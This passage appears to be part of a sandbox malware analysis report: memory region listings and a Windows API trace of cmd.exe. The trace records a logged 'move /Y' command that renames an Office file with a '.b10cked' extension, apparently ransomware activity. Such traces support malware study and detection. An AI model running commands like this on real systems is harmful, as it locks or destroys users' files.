23370 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23371 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23372 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23373 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 23374 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23375 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23376 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23377 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23378 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23379 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23380 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23381 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23382 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23383 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 23384 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23385 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23386 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23387 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23388 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23389 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 23390 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 23391 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 23392 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 363 os_tid = 0x9e0 [0172.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afe84 | out: lpSystemTimeAsFileTime=0x2afe84*(dwLowDateTime=0x9c7a6280, dwHighDateTime=0x1d440a9)) [0172.100] GetCurrentProcessId () returned 0x848 [0172.100] GetCurrentThreadId () returned 0x9e0 [0172.100] GetTickCount () returned 0x322bc [0172.100] QueryPerformanceCounter (in: lpPerformanceCount=0x2afe7c | out: lpPerformanceCount=0x2afe7c*=22888912512) returned 1 [0172.101] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.101] __set_app_type (_Type=0x1) [0172.101] __p__fmode () returned 0x76b331f4 [0172.101] __p__commode () returned 0x76b331fc [0172.101] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.101] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.101] GetCurrentThreadId () returned 0x9e0 [0172.101] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9e0) returned 0x38 [0172.101] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.101] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.101] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.102] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.102] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afe14 | out: phkResult=0x2afe14*=0x0) returned 0x2 [0172.102] VirtualQuery (in: lpAddress=0x2afe4b, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.102] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.102] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.102] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.102] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.102] GetConsoleOutputCP () returned 0x1b5 [0172.102] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.102] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.102] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.102] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.103] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.103] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.103] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.103] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.103] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.103] GetEnvironmentStringsW () returned 0x80210* [0172.103] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0172.104] GetEnvironmentStringsW () returned 0x80210* [0172.104] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0172.104] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed84 | out: phkResult=0x2aed84*=0x40) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0xa0, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x0, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegCloseKey (hKey=0x40) returned 0x0 [0172.104] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed84 | out: phkResult=0x2aed84*=0x40) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x0, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.104] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.105] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x4) returned 0x0 [0172.105] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x1000) returned 0x2 [0172.105] RegCloseKey (hKey=0x40) returned 0x0 [0172.105] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886387 [0172.105] srand (_Seed=0x5b886387) [0172.105] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"" [0172.105] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"" [0172.105] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.105] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x81970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.105] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.105] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.106] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.106] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.106] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.106] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.106] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.106] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.106] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.106] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.106] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.106] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.106] GetEnvironmentStringsW () returned 0x82360* [0172.106] FreeEnvironmentStringsW (penv=0x82360) returned 1 [0172.106] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.106] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.106] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.106] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.106] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.106] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.106] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.106] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.106] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.106] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.106] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.106] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afb50, lpFilePart=0x2afb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afb4c*="Desktop") returned 0x18 [0172.107] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.107] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0x809f0 [0172.107] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0172.107] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0x809f0 [0172.107] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0172.107] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0x809f0 [0172.107] FindClose (in: hFindFile=0x809f0 | out: hFindFile=0x809f0) returned 1 [0172.107] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.107] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.107] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.108] GetEnvironmentStringsW () returned 0x80210* [0172.108] FreeEnvironmentStringsW (penv=0x80210) returned 1 [0172.108] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.108] GetConsoleOutputCP () returned 0x1b5 [0172.108] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.108] GetUserDefaultLCID () returned 0x409 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afc90, cchData=128 | out: lpLCData="0") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afc90, cchData=128 | out: lpLCData="0") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afc90, cchData=128 | out: lpLCData="1") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.109] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.110] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.111] GetConsoleTitleW (in: lpConsoleTitle=0x70930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.111] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.111] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.111] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.112] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.112] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.112] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.112] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.112] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.112] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.112] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.116] GetConsoleTitleW (in: lpConsoleTitle=0x2af988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.414] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.414] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.414] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.414] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.414] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.414] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.414] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.414] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.415] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.415] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.415] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.415] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.415] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.415] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.415] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.415] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.415] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.415] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.415] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.415] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.415] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.415] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.415] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.415] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.415] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.415] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.415] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.415] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.415] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.415] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.415] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.415] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.415] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.415] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.415] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.417] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af744, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af73c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af73c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.418] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.419] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.419] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0172.419] _wcsicmp (_String1="OUTLWV~1.TRX", _String2=".") returned 65 [0172.419] _wcsicmp (_String1="OUTLWV~1.TRX", _String2="..") returned 65 [0172.419] GetFileAttributesW 